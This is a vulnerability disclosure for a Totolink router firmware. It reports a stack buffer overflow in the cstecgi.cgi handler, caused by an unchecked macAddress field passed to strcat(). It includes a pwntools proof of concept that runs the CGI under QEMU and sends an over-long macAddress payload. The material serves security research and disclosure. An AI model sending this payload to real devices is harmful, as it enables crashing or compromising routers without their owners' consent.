IoT-vuln/Totolink/1.setWiFiAclAddConfig
Overview

Affected version

V4.3.0cu.7647_B20210106

Vulnerability details

The vulnerability is in the router's web component, /web_cste/cgi-bin/cstecgi.cgi. The function FUN_0041b448 (at address 0x41b448) reads the JSON parameter macAddress but never checks its length; it passes the value straight to strcat(), appending it to a fixed-size local variable on the stack, so an over-long macAddress causes a stack-based buffer overflow:

[image: 1.png, decompilation of FUN_0041b448]

As the decompilation above shows, once macAddress has been read it is split on ":" and each piece is appended with strcat() to the local variable local_3c. Neither the length of the individual pieces nor the running total is checked against the size of local_3c, so a long macAddress value writes past the end of the buffer.

POC

```python
from pwn import *
import json

# Request body for the vulnerable handler. macAddress is the field that
# overflows: its first two ":"-separated pieces are 0x200 and 0x100 bytes.
data = {
    "topicurl": "setting/setWiFiAclAddConfig",
    "wifiIdx": "0",
    "addEffect": "0",
    "comment": "AAA",
    "macAddress": "A"*0x200 + ":" + "A"*0x100 + ":A:A"
}
data = json.dumps(data)
print(data)

# Run the CGI binary under user-mode QEMU with the firmware's libraries.
# hook.so is a preloaded shim supplied with the repo environment; the CGI
# reads the body from stdin and takes its length from CONTENT_LENGTH.
argv = [
    "qemu-mips-static",
    "-L", "./lib",
    "-E", "LD_PRELOAD=./hook.so",
    "-E", "CONTENT_LENGTH={}".format(len(data)),
    "-E", "REMOTE_ADDR=192.168.2.1",
    "./cstecginew.cgi"
]

a = process(argv=argv)

# Deliver the JSON body on stdin, as the web server would.
a.sendline(data.encode())

a.interactive()
```